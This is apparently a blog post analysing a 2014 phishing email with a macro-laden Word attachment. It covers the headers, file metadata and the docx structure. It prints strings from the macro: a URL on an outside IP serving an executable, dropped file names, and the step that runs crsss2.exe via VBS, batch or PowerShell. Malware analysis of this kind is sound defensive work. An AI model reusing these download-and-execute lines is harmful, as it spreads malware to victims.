“X-Gm-Spam: 1” and “X-Gm-Phishy: 1” tells me that the Gmail spam filters (formerly known as Postini) think this is spam and possibly a phishing attempt, but they let it through anyway. Thanks Gmail.

“abts-mum-static-132.109.170.122.airtelbroadband.in” is a static IP address of a broadband service, probably in or at least near Mumbai, India. Static addresses usually go to business customers, so this probably belongs to a small company. According to http://en.wikipedia.org/wiki/Bharti_Airtel, Airtel runs a cellular network, fixed line broadband to homes, and provides TV service – so, basically, India’s version of Verizon.

It wasn’t the email or the headers that got my attention, though. It was the attachment. It’s been a while since I’ve seen an attempt to use a Word Document to spread malware. Very late-90’s of them.

Stepping over to the “Additional Information” tab, we see some interesting lines.

“File type: Office Open XML Document” but this was a .doc not a .docx.

“File names:” – has been uploaded several times under different names. All the names follow the same two letters, seven numbers, two letters ([A-Z]{2}[0-9]{7}[A-Z]{2}\.doc) format. Indicates programmatically created names and no imagination.

“Company: SPecialiST RePack” – created with a pirated copy of Word. A google of those two words lead me to this Russian pirate website: http:// www . 5peciali5t . tk

“Creator: MMM” – the user name supplied by installed this pirated copy of Word

“CreateDate: 2014:10:18 09:14:00Z” – this shows when Word created the new document. This is when the “new” button is pressed, which usually occurs before typing and pressing the save button.

“ModifyDate: 2014:10:22 12:53:00Z” – this shows when Word last hit the save button. That is about 2 days worth of work on the part of this attacker, though it could be longer if the macro was cut-n-pasted from elsewhere. What is interesting here is how quickly this went from saved to sent (1pm to 3pm).

On to the file itself. Since it is really a docx and since those are really zipped XML, our first step is unzipping it.

doc/word/document.xml – the actual document. It just says “You didn’t enable macros.” And then has a picture to show you how. How convenient.

doc/word/media/image1.gif – the embedded image

doc/word/vbaData.xml – the part of the word doc that says how to handle the macro. The interesting part here is that there are actually four embedded macros:

ThisDocument.Auto_Open

ThisDocument.h

ThisDocument.Workbook_Open

ThisDocument.AutoOpen

This shows that the code was written to work in either Word or Excel, as AutoOpen is the only one that has meaning in Word, whereas Auto_Open is the command that would work in Excel. Workbook_Open is also Excel specific and slightly redundant, the difference between it and Auto_Open is slight and has to do with when each event is fired.

doc/word/vbaProject.bin – this is the actual macro. I don’t really want to spend a lot of time doing code analysis here, but I will show you some interesting strings pulled from the file. The rest of the file was uploaded to pastebin here http://pastebin.com/NUGPQAFs

$url = ‘http:// 162.243.234.167:8080 / gr / 4.exe’;

$file = ‘crsss2.exe’;

$someFilePath = $ScriptDir + ‘crsss2.exe’;

$vbsFilePath = $ScriptDir + ‘ntuserskk.vbs’;

$batFilePath = $ScriptDir + ‘ntusersss.bat’;

$psFilePath = $ScriptDir + ‘ntusersc.ps1’;

exe /c crsss2.exe;

So, basically, the code downloads “crsss2.exe” then tries to execute it via either a VisualBasic script, batch file, or powershell script. The IP “162.243.234.167” belongs to a Great Lakes Dermatology in New York.

The “File Detail” tab at VirusTotal contained some fields that I thought might be interesting, but were coming back garbled. They get their data from a great tool that I love called ExifTool. So, I ran that locally and it turns out the garbled text was garbled because it was in Cyrillic.